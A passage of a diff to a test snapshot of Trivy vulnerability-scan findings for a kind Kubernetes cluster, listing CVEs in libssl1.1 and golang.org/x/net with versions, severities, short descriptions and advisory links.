"https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", + "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27664", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2357", + "https://access.redhat.com/security/cve/CVE-2022-27664", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2113814", + "https://bugzilla.redhat.com/2124669", + "https://bugzilla.redhat.com/2132868", + "https://bugzilla.redhat.com/2132872", + "https://bugzilla.redhat.com/2161274", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "https://errata.rockylinux.org/RLSA-2022:7129", + "https://github.com/advisories/GHSA-69cg-p879-7622", + "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "https://github.com/golang/go/issues/54658", + "https://go.dev/cl/428735", + "https://go.dev/issue/54658", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-27664.html", + "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "https://pkg.go.dev/vuln/GO-2022-0969", + "https://security.gentoo.org/glsa/202209-26", + "https://security.netapp.com/advisory/ntap-20220923-0004/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-27664", + ], + }, + "category": "Vulnerability", + "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "handle server errors after sending GOAWAY", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "value": "https://avd.aquasec.com/nvd/cve-2022-27664", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "value": "https://access.redhat.com/errata/RHSA-2023:2357", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "value": "https://access.redhat.com/security/cve/CVE-2022-27664", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://bugzilla.redhat.com/2107383", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://bugzilla.redhat.com/2107388", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://bugzilla.redhat.com/2113814", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://bugzilla.redhat.com/2124669", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://bugzilla.redhat.com/2132868", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://bugzilla.redhat.com/2132872", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4304.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", + "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", + "value": "https://errata.rockylinux.org/RLSA-2022:7129", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://github.com/advisories/GHSA-69cg-p879-7622", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4304", + "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb10u5", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0465", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0465", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", - "https://linux.oracle.com/cve/CVE-2023-0465.html", - "https://linux.oracle.com/errata/ELSA-2023-3722.html", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", - "https://security.netapp.com/advisory/ntap-20230414-0001/", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0465", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230328.txt", - ], - }, - "category": "Vulnerability", - "description": "Applications that use a non-default option when verifying certificates may be -vulnerable to an attack from a malicious CA to circumvent certain checks. - -Invalid certificate policies in leaf certificates are silently ignored by -OpenSSL and other certificate policy checks are skipped for that certificate. -A malicious CA could use this to deliberately assert invalid certificate policies -in order to circumvent policy checking on the certificate altogether. - -Policy processing is disabled by default but can be enabled by passing -the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "Invalid certificate policies in leaf certificates are silently ignored", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0465", + "value": "https://github.com/golang/go/issues/54658", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0465", + "value": "https://go.dev/cl/428735", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "value": "https://go.dev/issue/54658", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0465.html", + "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + "value": "https://pkg.go.dev/vuln/GO-2022-0969", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://security.gentoo.org/glsa/202209-26", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230328.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u5", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0466", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.7.0", + "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41723", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0466", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", - "https://linux.oracle.com/cve/CVE-2023-0466.html", - "https://linux.oracle.com/errata/ELSA-2023-3722.html", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", - "https://security.netapp.com/advisory/ntap-20230414-0001/", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0466", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230328.txt", + "https://access.redhat.com/security/cve/CVE-2022-41723", + "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "https://go.dev/cl/468135", + "https://go.dev/cl/468295", + "https://go.dev/issue/57855", + "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "https://pkg.go.dev/vuln/GO-2023-1571", + "https://vuln.go.dev/ID/GO-2023-1571.json", + "https://www.cve.org/CVERecord?id=CVE-2022-41723", ], }, "category": "Vulnerability", - "description": "The function X509_VERIFY_PARAM_add0_policy() is documented to -implicitly enable the certificate policy check when doing certificate -verification. However the implementation of the function does not -enable the check which allows certificates with invalid or incorrect -policies to pass the certificate verification. - -As suddenly enabling the policy check could break existing deployments it was -decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() -function. - -Instead the applications that require OpenSSL to perform certificate -policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly -enable the policy check by calling X509_VERIFY_PARAM_set_flags() with -the X509_V_FLAG_POLICY_CHECK flag argument. - -Certificate policy checks are disabled by default in OpenSSL and are not -commonly used by applications.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "Certificate policy check not enabled", + "name": "avoid quadratic complexity in HPACK decoding", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0466", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0466", + "value": "https://avd.aquasec.com/nvd/cve-2022-41723", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "value": "https://access.redhat.com/security/cve/CVE-2022-41723", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "value": "https://go.dev/cl/468135", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "value": "https://go.dev/cl/468295", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "value": "https://go.dev/issue/57855", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0466.html", + "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "value": "https://pkg.go.dev/vuln/GO-2023-1571", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://vuln.go.dev/ID/GO-2023-1571.json", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230328.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-6755", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.4.0", + "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41717", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", "references": [ - "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", - "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", - "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", - "http://rump2007.cr.yp.to/15-shumow.pdf", - "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", - "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", - "http://www.securityfocus.com/bid/63657", - "https://access.redhat.com/security/cve/CVE-2007-6755", - "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", - "https://www.cve.org/CVERecord?id=CVE-2007-6755", - "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + "https://access.redhat.com/errata/RHSA-2023:2367", + "https://access.redhat.com/security/cve/CVE-2022-41717", + "https://bugzilla.redhat.com/2092793", + "https://bugzilla.redhat.com/2161274", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "https://go.dev/cl/455635", + "https://go.dev/cl/455717", + "https://go.dev/issue/56350", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-41717.html", + "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "https://pkg.go.dev/vuln/GO-2022-1144", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-41717", ], }, "category": "Vulnerability", - "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "Dual_EC_DRBG: weak pseudo random number generator", + "name": "excessive memory growth in a Go server accepting HTTP/2 requests", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-6755", - }, - { - "type": "URL", - "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "value": "https://avd.aquasec.com/nvd/cve-2022-41717", }, { "type": "URL", - "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "value": "https://access.redhat.com/errata/RHSA-2023:2367", }, { "type": "URL", - "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-41717", }, { "type": "URL", - "value": "http://rump2007.cr.yp.to/15-shumow.pdf", + "value": "https://bugzilla.redhat.com/2092793", }, { "type": "URL", - "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/63657", + "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2007-6755", + "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", }, { "type": "URL", - "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + "value": "https://go.dev/cl/455635", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-0928", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", - "references": [ - "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", - "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", - "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", - "http://www.osvdb.org/62808", - "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", - "https://access.redhat.com/security/cve/CVE-2010-0928", - "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", - "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", - "https://www.cve.org/CVERecord?id=CVE-2010-0928", - ], - }, - "category": "Vulnerability", - "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "openssl: RSA authentication weakness", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-0928", + "value": "https://go.dev/cl/455717", }, { "type": "URL", - "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "value": "https://go.dev/issue/56350", }, { "type": "URL", - "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", }, { "type": "URL", - "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", }, { "type": "URL", - "value": "http://www.osvdb.org/62808", + "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", }, { "type": "URL", - "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-0928", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", }, { "type": "URL", - "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "value": "https://pkg.go.dev/vuln/GO-2022-1144", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 